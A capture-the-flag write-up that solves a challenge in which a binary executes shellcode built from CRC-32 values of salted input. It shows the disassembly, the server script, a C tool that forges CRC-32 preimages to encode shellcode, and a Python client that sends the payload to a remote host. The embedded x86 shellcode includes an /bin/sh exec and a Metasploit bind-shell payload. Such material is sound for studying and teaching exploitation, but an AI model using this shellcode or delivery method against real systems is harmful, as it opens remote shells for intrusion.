This is a level that, at first, seemed like it would be extremely simple, but then turned out to be far more complicated than expected. We were provided a zip file containing a python script and an elf binary.
Disassembling the binary reveals a very basic program:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
/ (fcn) sym.main 165
| 0x0804847d 55 push ebp
| 0x0804847e 89e5 mov ebp, esp
| 0x08048480 83e4f0 and esp, 0xfffffff0
| 0x08048483 83ec30 sub esp, 0x30
| 0x08048486 8b450c mov eax, [ebp+0xc]
| 0x08048489 83c004 add eax, 0x4
| 0x0804848c 8b00 mov eax, [eax]
| 0x0804848e 890424 mov [esp], eax
| ; CODE (CALL) XREF from 0x08048376 (fcn.08048376)
| ; CODE (CALL) XREF from 0x08048370 (fcn.08048366)
| 0x08048491 e8dafeffff call 0x108048370 ; (sym.imp.atoi)
| sym.imp.atoi(unk)
| 0x08048496 89442428 mov [esp+0x28], eax
| 0x0804849a c7442424000. mov dword [esp+0x24], 0x0
| 0x080484a2 c7442408040. mov dword [esp+0x8], 0x4
| 0x080484aa 8d442424 lea eax, [esp+0x24]
| 0x080484ae 89442404 mov [esp+0x4], eax
| 0x080484b2 8b442428 mov eax, [esp+0x28]
| 0x080484b6 890424 mov [esp], eax
| ; CODE (CALL) XREF from 0x08048330 (fcn.0804832c)
| 0x080484b9 e872feffff call 0x108048330 ; (sym.imp.read)
| sym.imp.read()
| 0x080484be 8b442424 mov eax, [esp+0x24]
| 0x080484c2 c7442414000. mov dword [esp+0x14], 0x0
| 0x080484ca c7442410fff. mov dword [esp+0x10], 0xffffffff
| 0x080484d2 c744240c220. mov dword [esp+0xc], 0x22
| 0x080484da c7442408070. mov dword [esp+0x8], 0x7
| 0x080484e2 89442404 mov [esp+0x4], eax
| 0x080484e6 c7042400000. mov dword [esp], 0x0
| ; CODE (CALL) XREF from 0x08048350 (fcn.08048346)
| 0x080484ed e85efeffff call 0x108048350 ; (sym.imp.mmap)
| sym.imp.mmap()
| 0x080484f2 8944242c mov [esp+0x2c], eax
| 0x080484f6 8b442424 mov eax, [esp+0x24]
| 0x080484fa 89442408 mov [esp+0x8], eax
| 0x080484fe 8b44242c mov eax, [esp+0x2c]
| 0x08048502 89442404 mov [esp+0x4], eax
| 0x08048506 8b442428 mov eax, [esp+0x28]
| 0x0804850a 890424 mov [esp], eax
| 0x0804850d e81efeffff call 0x108048330 ; (sym.imp.read)
| sym.imp.read()
| 0x08048512 31c0 xor eax, eax
| 0x08048514 31c9 xor ecx, ecx
| 0x08048516 31d2 xor edx, edx
| 0x08048518 31db xor ebx, ebx
| 0x0804851a 31f6 xor esi, esi
| 0x0804851c 31ff xor edi, edi
\ 0x0804851e ff64242c jmp dword [esp+0x2c]
It takes a single argument, an integer, which it uses as a file descriptor for input. It then reads 4 bytes from the file descriptor, mmap’s an anonymous block of memory of that size with RWX permissions, then reads that many bytes from the file descriptor into the mapped region, and finally jumps to the map region. So, in summary, read shellcode length, read shellcode, then jump to shellcode.
So, let’s look at the python script responsible for launching the program and reading the input.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#!/usr/bin/python
import os, signal, struct, binascii
from sys import stdin, stdout
UI = lambda a : struct.unpack('I', a)[0]
PI = lambda a : struct.pack('I', a)
def crc32(data, salt) :
return PI(binascii.crc32(salt + data) & 0xffffffff)
def main() :
signal.alarm(25)
salt = os.urandom(10)
print 'salt:', salt.encode('hex')
stdout.flush()
n = UI(stdin.read(4))
data = ''.join(crc32(stdin.read(UI(stdin.read(4))), salt) for _ in xrange(n))
fi, fo = os.pipe()
if not os.fork() :
os.execl('/home/sc/thisisnotbad', 'thisisnotbad', '%d' % fi)
else :
os.write(fo, PI(len(data)))
os.write(fo, data)
if __name__ == '__main__' :
main()
As you can tell, it provides a 10 byte salt, then reads in 4 bytes (n
), then finally reads n
blocks prefixed by a 4-byte length. Next, for each block, it computes the crc32 of the block with the salt prepended. Finally, the crc32s are concatenated as the shellcode to be executed.
So, to get useful shellcode, we have to mount a preimage attack on CRC-32. Fortunately, CRC-32 is not a cryptographically secure hash, and Julien Tinnes has done the heavy lifting for us. So, we can take our shellcode as the desired CRC32s and compute the preimage of salt+preimage vector (4 bytes), then break the result into 4 byte chunks and send them along with appropriate lengths.
I wrote a little C program to use the calcvect.c from tweakcrc to compute the preimages given the salt, then used python for all the socket communications. (Because why do sockets in C when you can avoid it?)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#!c
#include "crc32.h"
#include <string.h>
#include <stdio.h>
#include <arpa/inet.h>
/*
const char *shellcode = "\x31\xc0\x50\x68"
"\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50"
"\x53\x89\xe1\xb0"
"\x0b\xcd\x80\x90";
*/
unsigned char shellcode[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a"
"\x02\x89\xe1\xb0\x66\xcd\x80\x5b"
"\x5e\x52\x68\x02\x00\x16\x9d\x6a"
"\x10\x51\x50\x89\xe1\x6a\x66\x58"
"\xcd\x80\x89\x41\x04\xb3\x04\xb0"
"\x66\xcd\x80\x43\xb0\x66\xcd\x80"
"\x93\x59\x6a\x3f\x58\xcd\x80\x49"
"\x79\xf8\x68\x2f\x2f\x73\x68\x68"
"\x2f\x62\x69\x6e\x89\xe3\x50\x53"
"\x89\xe1\xb0\x0b\xcd\x80\x90\x90";
#define SC_LEN 80
#define CHUNK_SIZE 4
char shellcode_out[SC_LEN];
char tmpbuf[14];
unsigned int tweakcrc(void *map, int length, unsigned int target, unsigned int offset);
void decode_hex(char *dst, const char *src) {
int i;
for (i=0; i<strlen(src)/2; i ++)
sscanf(&(src[i*2]), "%2hhx", &dst[i]);
}
int main(int argc, char **argv) {
int i;
int target;
decode_hex(tmpbuf, argv[1]);
gen_table();
for (i=0; i<(SC_LEN/CHUNK_SIZE); i++){
*(int *)(tmpbuf + 10) = 0;
//for (k=0; k<14; k++)
//fprintf(stderr, "%02hhx", tmpbuf[k]);
//fprintf(stderr, "\n");
target = *((int *)&shellcode[i*CHUNK_SIZE]);
//target = htonl(target);
//fprintf(stderr, "Target: %08x\n", target);
tweakcrc(tmpbuf, 14, target, 10);
//for (k=0; k<14; k++)
//fprintf(stderr, "%02hhx", tmpbuf[k]);
//fprintf(stderr, "\n");
memcpy(&shellcode_out[i*CHUNK_SIZE], tmpbuf+10, 4);
}
for (i=0; i<SC_LEN; i++)
printf("%02hhx", shellcode_out[i]);
printf("\n");
return 0;
}
You might notice a commented out shellcode. At first, I just tried a basic x86 shell exec, but stdin/stdout do not seem to connect through to the shellcode. I didn’t dig into why, just replaced my shellcode with linux/x86/shell_bind_tcp
from Metasploit.
To chunk and send my payload:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#!python
import socket
import subprocess
import struct
import binascii
def crc32(data, salt):
#print (salt+data).encode('hex')
v = struct.pack('I', binascii.crc32(salt + data) & 0xffffffff)
#print v.encode('hex')
return v
REMOTE = ('54.178.232.195', 5757)
#REMOTE = ('localhost', 5555)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(REMOTE)
print 'Connected.'
salt = s.recv(1024).strip().split(':')[1].strip()
print 'Salt: %s' % salt
shellcode = subprocess.check_output(
('./shellcode', salt)).strip()
print 'Shellcode: %s' % shellcode
shellcode = shellcode.decode('hex')
def send(what):
print what.encode('hex')
return s.send(what)
def chunks(sc):
return [sc[x:x+4] for x in xrange(0, len(sc), 4)]
nc = len(shellcode)/4
shellcode = ''.join('\x04\x00\x00\x00' + c for c in chunks(shellcode))
l = send(struct.pack('I', nc) + shellcode)
print 'Shellcode %d done.' % l
You might notice both programs have a lot of debugging print statements. Getting the endianness just right, tweaking the payload chunking, etc., consumed far more time than figuring out what the problem was.